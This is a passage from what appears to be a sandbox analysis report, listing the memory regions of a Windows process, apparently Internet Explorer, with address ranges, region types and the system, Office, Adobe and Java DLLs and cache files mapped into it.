0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 623 start_va = 0x11a0000 end_va = 0x146efff entry_point = 0x11a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 624 start_va = 0x6cff0000 end_va = 0x6da6ffff entry_point = 0x6cff0000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 625 start_va = 0x72360000 end_va = 0x7239bfff entry_point = 0x72360000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 626 start_va = 0x75820000 end_va = 0x75824fff entry_point = 0x75820000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 627 start_va = 0x470000 end_va = 0x470fff entry_point = 0x470000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 628 start_va = 0x1470000 end_va = 0x1471fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001470000" filename = "" Region: id = 629 start_va = 0x1480000 end_va = 0x1480fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001480000" filename = "" Region: id = 630 start_va = 0x1490000 end_va = 0x1491fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001490000" filename = "" Region: id = 631 start_va = 0x14a0000 end_va = 0x14a0fff entry_point = 0x0 region_type = private name = "private_0x00000000014a0000" filename = "" Region: id = 632 start_va = 0x74360000 end_va = 0x744fdfff entry_point = 0x74360000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 633 start_va = 0x771b0000 end_va = 0x7722afff entry_point = 0x771b0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 634 start_va = 0x5fff0000 end_va = 0x5fffffff entry_point = 0x0 region_type = private name = "private_0x000000005fff0000" filename = "" Region: id = 635 start_va = 0x6f9a0000 end_va = 0x6f9d4fff entry_point = 0x6f9a0000 region_type = mapped_file name = "ieshims.dll" filename = "\\Program Files\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files\\internet explorer\\ieshims.dll") Region: id = 636 start_va = 0x14b0000 end_va = 0x14b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014b0000" filename = "" Region: id = 637 start_va = 0x14c0000 end_va = 0x14c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014c0000" filename = "" Region: id = 638 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 639 start_va = 0x15f0000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x00000000015f0000" filename = "" Region: id = 640 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 641 start_va = 0x14d0000 end_va = 0x15aefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014d0000" filename = "" Region: id = 642 start_va = 0x15b0000 end_va = 0x15b0fff entry_point = 0x0 region_type = private name = "private_0x00000000015b0000" filename = "" Region: id = 643 start_va = 0x15c0000 end_va = 0x15c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015c0000" filename = "" Region: id = 644 start_va = 0x15d0000 end_va = 0x15d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015d0000" filename = "" Region: id = 645 start_va = 0x1630000 end_va = 0x169dfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001630000" filename = "" Region: id = 646 start_va = 0x1740000 end_va = 0x183ffff entry_point = 0x0 region_type = private name = "private_0x0000000001740000" filename = "" Region: id = 647 start_va = 0x1920000 end_va = 0x1a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001920000" filename = "" Region: id = 648 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 649 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 650 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 651 start_va = 0x1a80000 end_va = 0x1b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a80000" filename = "" Region: id = 652 start_va = 0x1c60000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 653 start_va = 0x1e40000 end_va = 0x203ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 654 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 655 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 656 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 657 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 658 start_va = 0x6f960000 end_va = 0x6f992fff entry_point = 0x6f960000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll") Region: id = 659 start_va = 0x15e0000 end_va = 0x15e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015e0000" filename = "" Region: id = 660 start_va = 0x2040000 end_va = 0x213ffff entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 661 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 662 start_va = 0x16a0000 end_va = 0x16a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000016a0000" filename = "" Region: id = 663 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 664 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 665 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 666 start_va = 0x16c0000 end_va = 0x16defff entry_point = 0x16c0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001a.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db") Region: id = 667 start_va = 0x16e0000 end_va = 0x16e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000016e0000" filename = "" Region: id = 668 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 669 start_va = 0x16b0000 end_va = 0x16b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000016b0000" filename = "" Region: id = 670 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 671 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 672 start_va = 0x2180000 end_va = 0x227ffff entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 673 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 674 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 675 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 676 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 740 start_va = 0x16f0000 end_va = 0x16f1fff entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 741 start_va = 0x1700000 end_va = 0x1701fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001700000" filename = "" Region: id = 742 start_va = 0x2280000 end_va = 0x2672fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002280000" filename = "" Region: id = 743 start_va = 0x26e0000 end_va = 0x27dffff entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 744 start_va = 0x2860000 end_va = 0x295ffff entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 745 start_va = 0x6de50000 end_va = 0x6de7afff entry_point = 0x6de50000 region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll") Region: id = 746 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 747 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 748 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 749 start_va = 0x1710000 end_va = 0x173bfff entry_point = 0x1710000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 750 start_va = 0x1840000 end_va = 0x1847fff entry_point = 0x1840000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 751 start_va = 0x1850000 end_va = 0x185ffff entry_point = 0x1850000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 752 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 753 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 754 start_va = 0x1870000 end_va = 0x18affff entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 755 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 756 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 757 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 758 start_va = 0x1860000 end_va = 0x1860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001860000" filename = "" Region: id = 759 start_va = 0x18e0000 end_va = 0x18e1fff entry_point = 0x0 region_type = private name = "private_0x00000000018e0000" filename = "" Region: id = 760 start_va = 0x2a60000 end_va = 0x2a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 761 start_va = 0x6de10000 end_va = 0x6de3dfff entry_point = 0x6de10000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 762 start_va = 0x18b0000 end_va = 0x18cffff entry_point = 0x0 region_type = private name = "private_0x00000000018b0000" filename = "" Region: id = 763 start_va = 0x18d0000 end_va = 0x18d0fff entry_point = 0x0 region_type = private name = "private_0x00000000018d0000" filename = "" Region: id = 764 start_va = 0x18f0000 end_va = 0x18f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000018f0000" filename = "" Region: id = 765 start_va = 0x1910000 end_va = 0x191ffff entry_point = 0x0 region_type = private name = "private_0x0000000001910000" filename = "" Region: id = 766 start_va = 0x2aa0000 end_va = 0x33cffff entry_point = 0x2aa0000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 767 start_va = 0x6f980000 end_va = 0x6f990fff entry_point = 0x6f980000 region_type = mapped_file name = "acroiehelpershim.dll" filename = "\\Program Files\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll" (normalized: "c:\\program files\\common files\\adobe\\acrobat\\activex\\acroiehelpershim.dll") Region: id = 768 start_va = 0x71320000 end_va = 0x713adfff entry_point = 0x71320000 region_type = mapped_file name = "msvcp90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll") Region: id = 769 start_va = 0x713b0000 end_va = 0x71452fff entry_point = 0x713b0000 region_type = mapped_file name = "msvcr90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll") Region: id = 770 start_va = 0x718b0000 end_va = 0x718fbfff entry_point = 0x718b0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 771 start_va = 0x6dd30000 end_va = 0x6ddb3fff entry_point = 0x6dd30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 772 start_va = 0x1900000 end_va = 0x1900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001900000" filename = "" Region: id = 773 start_va = 0x3590000 end_va = 0x359ffff entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 774 start_va = 0x6f970000 end_va = 0x6f97ffff entry_point = 0x6f970000 region_type = mapped_file name = "acroiehelper.dll" filename = "\\Program Files\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll" (normalized: "c:\\program files\\common files\\adobe\\acrobat\\activex\\acroiehelper.dll") Region: id = 775 start_va = 0x1a20000 end_va = 0x1a22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 776 start_va = 0x1a40000 end_va = 0x1a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 777 start_va = 0x712f0000 end_va = 0x7131afff entry_point = 0x712f0000 region_type = mapped_file name = "atl90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\\ATL90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\\atl90.dll") Region: id = 778 start_va = 0x71460000 end_va = 0x7186afff entry_point = 0x71460000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~1\\MICROS~1\\Office14\\GROOVEEX.DLL" (normalized: "c:\\progra~1\\micros~1\\office14\\grooveex.dll") Region: id = 779 start_va = 0x1a30000 end_va = 0x1a33fff entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 780 start_va = 0x1a50000 end_va = 0x1a67fff entry_point = 0x0 region_type = private name = "private_0x0000000001a50000" filename = "" Region: id = 781 start_va = 0x1a70000 end_va = 0x1a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a70000" filename = "" Region: id = 782 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = private name = "private_0x0000000001b80000" filename = "" Region: id = 783 start_va = 0x1b90000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b90000" filename = "" Region: id = 784 start_va = 0x1ba0000 end_va = 0x1baffff entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Region: id = 785 start_va = 0x1bb0000 end_va = 0x1bbffff entry_point = 0x0 region_type = private name = "private_0x0000000001bb0000" filename = "" Region: id = 786 start_va = 0x1bc0000 end_va = 0x1bcffff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 787 start_va = 0x1bd0000 end_va = 0x1bdffff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 788 start_va = 0x1be0000 end_va = 0x1beffff entry_point = 0x0 region_type = private name = "private_0x0000000001be0000" filename = "" Region: id = 789 start_va = 0x1bf0000 end_va = 0x1bfffff entry_point = 0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 790 start_va = 0x1db0000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 791 start_va = 0x70660000 end_va = 0x70ec3fff entry_point = 0x70660000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\PROGRA~1\\MICROS~1\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\progra~1\\micros~1\\office14\\1033\\grooveintlresource.dll") Region: id = 792 start_va = 0x72df0000 end_va = 0x72e83fff entry_point = 0x72df0000 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 793 start_va = 0x1c00000 end_va = 0x1c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 794 start_va = 0x1c10000 end_va = 0x1c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 795 start_va = 0x1c20000 end_va = 0x1c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Region: id = 796 start_va = 0x1c30000 end_va = 0x1c30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c30000" filename = "" Region: id = 797 start_va = 0x1c40000 end_va = 0x1c40fff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 798 start_va = 0x29e0000 end_va = 0x2a1ffff entry_point = 0x0 region_type = private name = "private_0x00000000029e0000" filename = "" Region: id = 799 start_va = 0x3490000 end_va = 0x358ffff entry_point = 0x0 region_type = private name = "private_0x0000000003490000" filename = "" Region: id = 800 start_va = 0x70ed0000 end_va = 0x712e9fff entry_point = 0x70ed0000 region_type = mapped_file name = "office.odf" filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\progra~1\\common~1\\micros~1\\office14\\cultures\\office.odf") Region: id = 801 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 802 start_va = 0x1c50000 end_va = 0x1c50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c50000" filename = "" Region: id = 803 start_va = 0x3640000 end_va = 0x373ffff entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 804 start_va = 0x3820000 end_va = 0x391ffff entry_point = 0x0 region_type = private name = "private_0x0000000003820000" filename = "" Region: id = 805 start_va = 0x3a40000 end_va = 0x3b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a40000" filename = "" Region: id = 806 start_va = 0x6dcb0000 end_va = 0x6dd23fff entry_point = 0x6dcb0000 region_type = mapped_file name = "ssv.dll" filename = "\\Program Files\\Java\\jre7\\bin\\ssv.dll" (normalized: "c:\\program files\\java\\jre7\\bin\\ssv.dll") Region: id = 807 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 808 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 809 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 810 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 811 start_va = 0x1d60000 end_va = 0x1d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 812 start_va = 0x1d70000 end_va = 0x1d70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d70000" filename = "" Region: id = 813 start_va = 0x1d80000 end_va = 0x1d82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d80000" filename = "" Region: id = 814 start_va = 0x3d30000 end_va = 0x3d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d30000" filename = "" Region: id = 815 start_va = 0x6c4c0000 end_va = 0x6c550fff entry_point = 0x6c4c0000 region_type = mapped_file name = "urlredir.dll" filename = "\\Program Files\\Microsoft Office\\Office14\\URLREDIR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\urlredir.dll") Region: id = 816 start_va = 0x6f950000 end_va = 0x6f963fff entry_point = 0x6f950000 region_type = mapped_file name = "msohev.dll" filename = "\\Program Files\\Microsoft Office\\Office14\\MSOHEV.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\msohev.dll") Region: id = 817 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 818 start_va = 0x1d90000 end_va = 0x1d93fff entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 819 start_va = 0x1da0000 end_va = 0x1daffff entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 820 start_va = 0x1df0000 end_va = 0x1e07fff entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 821 start_va = 0x1e10000 end_va = 0x1e10fff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 822 start_va = 0x1e20000 end_va = 0x1e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 823 start_va = 0x1e30000 end_va = 0x1e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 824 start_va = 0x2140000 end_va = 0x214ffff entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 825 start_va = 0x2150000 end_va = 0x215ffff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 826 start_va = 0x2160000 end_va = 0x216ffff entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 827 start_va = 0x2170000 end_va = 0x217ffff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 828 start_va = 0x6f920000 end_va = 0x6f94dfff entry_point = 0x6f920000 region_type = mapped_file name = "jp2ssv.dll" filename = "\\Program Files\\Java\\jre7\\bin\\jp2ssv.dll" (normalized: "c:\\program files\\java\\jre7\\bin\\jp2ssv.dll") Region: id = 829 start_va = 0x3ce0000 end_va = 0x3ceffff entry_point = 0x0 region_type = private name = "private_0x0000000003ce0000" filename = "" Region: id = 830 start_va = 0x6c070000 end_va = 0x6c12efff entry_point = 0x6c070000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files\\Java\\jre7\\bin\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre7\\bin\\msvcr100.dll") Region: id = 831 start_va = 0x2680000 end_va = 0x2681fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002680000" filename = "" Region: id = 832 start_va = 0x2850000 end_va = 0x285ffff entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 833 start_va = 0x6da70000 end_va = 0x6dacafff entry_point = 0x6da70000 region_type = mapped_file name = "deploy.dll" filename = "\\Program Files\\Java\\jre7\\bin\\deploy.dll" (normalized: "c:\\program files\\java\\jre7\\bin\\deploy.dll") Region: id = 834 start_va = 0x2960000 end_va = 0x29dffff entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 835 start_va = 0x752e0000 end_va = 0x7533efff entry_point = 0x752e0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1244 start_va = 0x2680000 end_va = 0x2691fff entry_point = 0x2680000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 1245 start_va = 0x26a0000 end_va = 0x26a7fff entry_point = 0x26a0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\feeds cache\\index.dat") Region: id = 1246 start_va = 0x26b0000 end_va = 0x26bcfff entry_point = 0x26b0000 region_type = mapped_file name = "acroiehelper.dll" filename = "\\Program Files\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll" (normalized: "c:\\program files\\common files\\adobe\\acrobat\\activex\\acroiehelper.dll") Region: id = 1247 start_va = 0x26c0000 end_va = 0x26c0fff entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 1248 start_va = 0x26d0000 end_va = 0x26d0fff entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 1249 start_va = 0x27e0000 end_va = 0x27e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027e0000" filename = "" Region: id = 1250 start_va = 0x27f0000 end_va = 0x27f7fff entry_point = 0x27f0000 region_type = mapped_file name = "urlmon.dll.mui" filename = 